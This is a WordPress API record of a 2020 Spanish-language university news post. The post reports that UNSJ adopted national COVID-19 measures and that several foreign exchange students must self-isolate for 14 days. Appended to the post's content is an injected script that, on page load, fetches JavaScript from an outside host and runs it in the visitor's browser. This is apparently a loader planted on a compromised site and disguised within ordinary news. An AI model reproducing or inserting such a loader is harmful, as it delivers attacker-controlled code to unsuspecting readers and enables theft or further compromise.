{"id":371,"date":"2020-03-11T12:46:16","date_gmt":"2020-03-11T15:46:16","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=371"},"modified":"2025-06-21T12:06:32","modified_gmt":"2025-06-21T15:06:32","slug":"la-unsj-adhirio-a-las-medidas-nacionales-por-el-coronavirus","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/03\/11\/la-unsj-adhirio-a-las-medidas-nacionales-por-el-coronavirus\/","title":{"rendered":"La UNSJ adhiri\u00f3 a las medidas nacionales por el Coronavirus"},"content":{"rendered":"\n<p> Estudiantes de intercambio que llegaron de Alemania y Francia deber\u00e1n permanecer aislados. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/www.genesisformal3.faud.unsj.edu.ar\/wp-content\/uploads\/2020\/03\/2020-03-111104_slide_4852-1024x768.jpg\" alt=\"\" class=\"wp-image-1015\"\/><\/figure>\n\n\n\n<p>Como parte de las acciones que se est\u00e1n llevando a cabo a nivel nacional para prevenir el contagio del COVID 19 (Coronavirus), el rector de la UNSJ, Oscar Nasisi, emiti\u00f3 una resoluci\u00f3n disponiendo la adhesi\u00f3n de la instituci\u00f3n a las respectivas resoluciones del Ministerio de Trabajo y Ministerio de Educaci\u00f3n de la Naci\u00f3n, que llevan los n\u00fameros 2020\/178 y 82.<\/p>\n\n\n\n<p><strong>Es por ello que el personal docente, no docente acad\u00e9micos temporarios, estudiantes e investigadores que hayan estado en alguno de los pa\u00edses con circulaci\u00f3n viral, deber\u00e1n permanecer aislados durante 14 d\u00edas, hasta que se constate que no est\u00e1n enfermos.<\/strong><\/p>\n\n\n\n<p><strong>En estos casos, se otorgar\u00e1 licencia especial en el caso de los trabajadores y se justificar\u00e1n las inasistencias, en el caso de los estudiantes.<\/strong><\/p>\n\n\n\n<p>Al respecto, el secretario de Posgrado y Relaciones Internacionales de la UNSJ, Marcelo Soria, refiri\u00f3 que \u201cel fin de semana \u00faltimo llegaron a San Juan tres estudiantes extranjeros, dos provenientes de Francia y uno de Alemania. Lo hicieron por v\u00eda a\u00e9rea hasta el aeropuerto de Mendoza y desde all\u00ed, por v\u00eda terrestre, hasta San Juan. Van\u00a0a permanecer aislados en forma voluntaria\u201d, dijo.<\/p>\n\n\n\n<p>Archivos:<\/p>\n\n\n\n<p> <a rel=\"noreferrer noopener\" href=\"http:\/\/unsj.edu.ar\/panel_unsj\/archivos\/noticias\/Resoluci%C3%B3n_N%C2%BA_0343-20-R_4852_019.pdf\" target=\"_blank\">Resoluci\u00f3n_N\u00ba_0343-20-R_4852_019.pdf<\/a> <\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Estudiantes de intercambio que llegaron de Alemania y Francia deber\u00e1n permanecer aislados. Como parte de las acciones que se est\u00e1n llevando a cabo a nivel nacional para prevenir el contagio del COVID 19 (Coronavirus), el rector de la UNSJ, Oscar Nasisi, emiti\u00f3 una resoluci\u00f3n disponiendo la adhesi\u00f3n de la instituci\u00f3n a las respectivas resoluciones del<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/03\/11\/la-unsj-adhirio-a-las-medidas-nacionales-por-el-coronavirus\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,9,7,8],"tags":[],"class_list":["post-371","post","type-post","status-publish","format-standard","hentry","category-diseno-grafico","category-diseno-industrial","category-faud","category-vida-universitaria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=371"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions"}],"predecessor-version":[{"id":861,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions\/861"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}